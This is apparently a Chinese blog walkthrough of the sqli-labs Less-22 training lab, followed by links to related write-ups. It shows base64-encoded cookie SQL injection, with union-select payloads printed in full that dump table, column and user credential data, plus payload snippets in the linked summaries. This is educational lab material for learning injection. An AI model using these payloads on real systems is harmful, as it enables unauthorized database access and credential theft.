sqli-labs-less-22 图文笔记

最新推荐文章于 2024-04-27 08:59:52 发布
最新推荐文章于 2024-04-27 08:59:52 发布
阅读量272 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql 信息安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/110549392
版权

Less-22

正常登陆:
在这里插入图片描述

查看一下cookie:
在这里插入图片描述

利用解密工具破解,value为admin,因此该关卡与less-21类似,我们知道加密解密方式后开始判断注入点:
更改cookie为admin”,返回错误:
在这里插入图片描述

更改为admin”#,返回正常,说明闭合方式为””,现在可以开始注入。
在这里插入图片描述

获取当前数据库:

" union select 1,2,database()#加密后得到:

IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
在这里插入图片描述

获取security库中的表:

" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)#加密后得到:

IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5Jykj
在这里插入图片描述

获取users表中的字段:

" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)#加密后得到:

IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpIw==
在这里插入图片描述

获取username和password:

" union select 1,2,(select group_concat(concat_ws(username,0x7e,password)) from security.users)#加密后得到:

IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbmNhdF93cyh1c2VybmFtZSwweDdlLHBhc3N3b3JkKSkgZnJvbSBzZWN1cml0eS51c2Vycykj
在这里插入图片描述

yzcn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs通关笔记(less11-less22)
south_layout的博客
05-06 287
文章目录less-11less-12less-14less-15less-16less-17less-18less-19less-20less-22 less-11 提交账号和密码均为123,执行的sql语句如下。可以用万能密码绕过。注意这里的注释不能用–+ payload:(post方式提交) uname=admin' order by 2#&passwd=123&submi...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 941
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场之SQL手注通关详解--基础篇(Less 1~22
qq_62169455的博客
07-30 961
1.判断注入点,这里的页面中没有可以注入的地方,因此可以判断注入点在url栏2.判断注入类型id=1 and 1=1 页面正常id=1 and 1=2 页面正常id=1' and 1=1 --+ 页面正常id=1' and 1=2 --+ 页面异常由此可以判断该注入类型为单引号字符型注入(当然这里也可以不用判断,根据关卡名称就可以看出来)3.判断字段数id=1' order by 3--+ 页面正常id=1' order by 4--+ 页面异常4.判断回显点。
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
Innocence_0的博客
04-27 1111
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
SQLi LABS Less-22
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlilabs22SQLi-LABS第二十一关
sqli-labs————less 22
Fly_鹏程万里
05-12 400
Less 22简单测试:username:adminpassword:aaa查看一下源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2865
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
Sqli-labs-master less1-22笔记
skynet_x的博客
10-28 493
#Sqli-labs-master 1-22 实验环境:Windows7 x64 专业版 ​ PHPstudy 2018 ​ PHP版本 5.4.45 ​ 靶机:Sqli-labs-master 注:LESS1-10为GET型注入 11-22为POST型注入 每道题解法不一定唯一 对于手法重复的关卡均未赘述 ##第一关:单引号报错 本关所用到的函数: ​ database() ---- 数据库名 ​ concat(str1,str2,…) ---- 没有
sqli-labs通关攻略教程四(less 18~less-22
m0_55854679的博客
07-11 265
sqli-labs通关攻略教程二(less 1~less-17) less 18 与第一关相同的步骤。首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。 输入正确的用户名和密码,发现页面回显了IP地址,构造的sql语句和浏览器的使用版本一些信息.。若密码输入错误,则无浏览器版本的回显信息。 **注意:**如果你的密码输入admin
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs (less20-less22)
Xi4or0uji
08-01 985
less 20 cookie注入 这关首先看源码可以看见首次登录,后台会把username放去cookie,再次登录的时候,如果cookie没过期,就会去cookie里面取值,然后进行查询,至于sql语句就是 所以我们只要去改掉他的cookie就可以拿到数据库的东西了 最后改出来是上面那个,为什么这样写呢,sql查询语句如果前面为空,就会将后面查出来的信息给出来 因为源码后面是将...
sqli-labs攻关3(Less-11~Less-22)
qwzf
11-14 321
前言 好久没打sqli-labs了,闲来无事继续打一下。 一、联合查询-POST注入 1、联合查询POST单引号注入 1.注入点判断 uname=admin\&passwd=&submit=Submit 通过添加反斜杠\,得知是'闭合 2.显示位判断 uname=不存在的用户' union select 1,2 #&passwd=&submit=Submit ...
sqli-labs (less-22)
kukudeshuo的博客
03-11 164
sqli-labs (less-22) 进入22关,输入用户名和密码,登入后与前两关一样,我们继续猜想为cookie注入 然后利用Cookies Manager +抓取cookie信息,发现也为base64加密 输入’,页面不报错,输入",页面报错 根据错误显示判断闭合方式为"#,并且为字符型注入 查看当前库 " union select 1,2,database()# 接下来的遇上一关基本一致,具体步骤请看我的less-21,这里我不具体介绍 ...
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1924
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
sqli-labs-less-7 使用outfile函数写入一句话木马
yzcn
10-30 1663
Less-7 一句话木马 判断注入点: 127.0.0.1/sqli-labs-master/Less-7/?id=1 显示正常 提示:You are in… Use outfile… 127.0.0.1/sqli-labs-master/Less-7/?id=1’ 显示错误,错误信息:You have an error in your SQL syntax 。。。。。。 127.0.0.1/sqli-labs-master/Less-7/?id=1’)) 显示错误 127.0.0.1/sqli-l
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值